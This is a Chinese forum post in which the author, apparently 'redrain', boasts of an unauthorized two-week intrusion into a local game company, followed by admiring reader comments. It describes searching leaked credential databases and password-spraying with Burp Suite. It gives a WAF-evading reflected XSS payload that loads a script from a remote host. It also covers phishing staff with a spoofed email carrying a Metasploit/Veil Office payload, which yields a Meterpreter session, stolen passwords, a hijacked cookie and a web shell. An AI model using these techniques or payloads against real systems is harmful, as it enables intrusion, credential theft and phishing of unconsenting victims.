针对当地某游戏公司的小型APT

小男孩

Author：redrain
site：http://www.fuckgcd.net

0×00背景

这次APT应该算是一次很小的渗透，前后持续了可能两周左右（大概从我去西电比赛回来开始到现在），不过因为比较懒，所以截图也不多，主要是叙述事件

目标是我这里本地的一家游戏公司，号称斥资5000w打造，加上去年我和小伙伴在这家公司领过1w的奖金，所以造成了我对目标公司”人傻钱多速来“的看法，后来因为有一个妹子在此公司上班，有天手贱发了个xss的截图给妹子，妹子顺手给了领导看，领导十分不屑：一个跨站而已，不碍事的。好吧，一个跨站而已=。=闲极无聊就搞搞呗

废话扯完，以下正片

（P.S在本人渗透完成到本文发出时，后门及shell已删）

=====================================================


0×01信息收集

目标公司：XX网络科技有限公司（XX游戏）

URL：http://www.xxxxcom.com

          http://www.xxxxcom.cn（公司另一域名）

          http://www.xxxxcom.cn.com（公司另一域名）

通过浏览主站和查询whois信息，得知其公司工作邮箱，域名所有人信息，HR联系方式等



结合社工库查询，综合得到目标公司一高管信息

工作邮箱直接查询到了密码，但是输入后提示密码错误，看来修改过，但仔细一看，均为有规律的弱口令

三个数字重复或者是键盘向下的方式组合的口令，于是我果断的决定根据这个规律碰撞一下其他密码试试

经过碰撞，把得到的密码丢到burpsuite重复提交到目标公司网站的登陆界面（本来想登录邮箱的，无奈网易有防止重复提交的策略）

跑了好一阵子，未果，碰撞密码，暂时搁浅

后来想起，whois信息中，域名是xinnet的，于是开心的去查询新网的裤子，不过查询结果很失望，密码依旧不对

至此第一次试探搁浅



0×02对目标网站的测试

目标站点进行cms指纹识别后反应是良精南方的，但是看了看用的是.net的架构，想到去年和小伙伴领1w的原因就是因为发现该站点的漏洞，于是乎又折头看了看，shell已删除，并且管理后台重做过，去年是用的admin.xxxxcom.com做的后台，现在看了看已经重做，只能放弃，不过好在菜刀还有缓存，通过缓存浏览了web目录下的大概情况，有个bbs，一个前台，一个主站，均为.net架构，论坛更是Discuz!NT 3.6.711 出名的难日，浏览缓存后发现某目录下存在一富文本编辑器，访问后结果依旧不尽人意



果断放弃之，然后看了看去年找到的一个主站sql注入



装了新的安全狗，无力去继续绕过waf，放弃=。=

唔，那怎么办呢，接下来就对目标站点进行了FUZZ扫描，哟~好吧，就只扫到我之前说的那个xss，还是反射型的，不过突然想到目标公司的人说不就是个跨站么，这句话让我又不开心了起来，哥今天就拿这个屌丝反射型跨站逆袭给你看！



0×03反射型xss的逆袭之路（伪水坑攻击）

因为装了安全狗，所以要稍微进行攻击代码构造绕过一下

该反射构造的代码如下：

http://www.xxxxcom.com/UserRegis ... lert%28/test/%29%3E




通过img标签构造iMg大小写的方式绕过，用onerror属性加载
onerror=eval(javascript:document.write(unescape(‘ <script src=”http://xxx.js”></script>’));)


[color=rgb(51, 102, 153) !important]复制代码

对eval操纵的内容进行16进制编码后测试通过

之后进行了第一次攻击尝试

找到客服反馈问题，我说你们游戏的注册页面有问题啊，没办法注册，注册的地址是不是这个啊（然后发了经过短域名处理的攻击url）

一般情况，客服都会来解决问题，但是该公司客服非常奇葩。。。说：哦，我也不知道啊，要不你下载个客户端去注册吧。

经过我机智的对话，仍然没有让其点击连接（给客服大爷您跪了）

第一次水坑攻击尝试失败。。暂时搁浅



0×04第二次信息收集

首次尝试接连受挫，我过了几天在群里打屁，正好那个在这家公司上班的妹子也在，我就顺口问了问公司的情况

大概收集到信息为：

公司员工办公电脑均为win7，文字处理软件有office和wps但是默认使用的是office，公司并没有规定统一

不过好消息是office是默认的，以前看大牛们玩apt的时候都会很流弊的拿出office的漏洞通过邮件攻击搞定一切

做了个简易的接收端，探测公司那边的组件和杀毒软件

通过骗取点击后，接收端收到了session的信息，现在掌握的信息为：

office版本为2007，浏览器为IE8，杀毒软件360，以及IP出口



0×05最后的冲锋，反射型xss终于逆袭

一切基本就绪，天随人愿的是我这里正好也有公网ip

但是有360略蛋疼，不过上次听maple说veil比较牛逼，我office用的payload自然是来自鱼msf，那么就结合veil碰碰运气吧。。

找了个fake-email发伪造邮件

大概内容就是一篇求职的，附带了doc，doc里带了msf生成的

为了保险起见，除了附件有doc外，我还在邮件内容里加了经过短域名处理的xss攻击连接

邮件发过去了，一直开着msf等消息，不过貌似人家周日的时候不上班（这里是我的问题，APT基本上就做一次，不成功便成仁，好险差点因为时间的问题不成功）

吓的我一直开着电脑，第二天大概十点过，msf这边有动静了，好吧，可以返回Meterpreter会话了，总算是摸到了目标公司的设备（尽管只是一台个人电脑）

不过运气真不错，不知道是veil的原因免杀了360还是因为人品比较好当时对方360没有开，反正会话是反弹到了，快速的翻了翻对方的盘符，在文档里找到一份对应用户密码的记录，type了一下快速记录下来后把马删了撤退走人

好消息一个接着一个，之前在邮件内容中写入的短域名xss也被触发了，果断用其cookie登录，不过比较可惜，因为是反射型，对方后台找不到，只登录了前台



通过前台并没有进入后台的地方，但是论坛和前台互通，所以，嘿嘿~~是个超级版主




0×06尾声

之后的事情就不用说了，shell到手，对应用户密码也在个人电脑上扒拉到，呵呵~



最后我溜达了一圈，把shell删了，走人，只为证明反射型xss也是可以屌丝逆袭高富帅的！

写下这篇文章，默默抽根手边的花玉溪，深藏功与名

90_

我了个擦，xss  安全狗没拦截？

夜尽天明

长见识了，嗯，给力

love

默默的说我不会xss 呜呜

m0ox

深藏功与名
   我喜欢  哈哈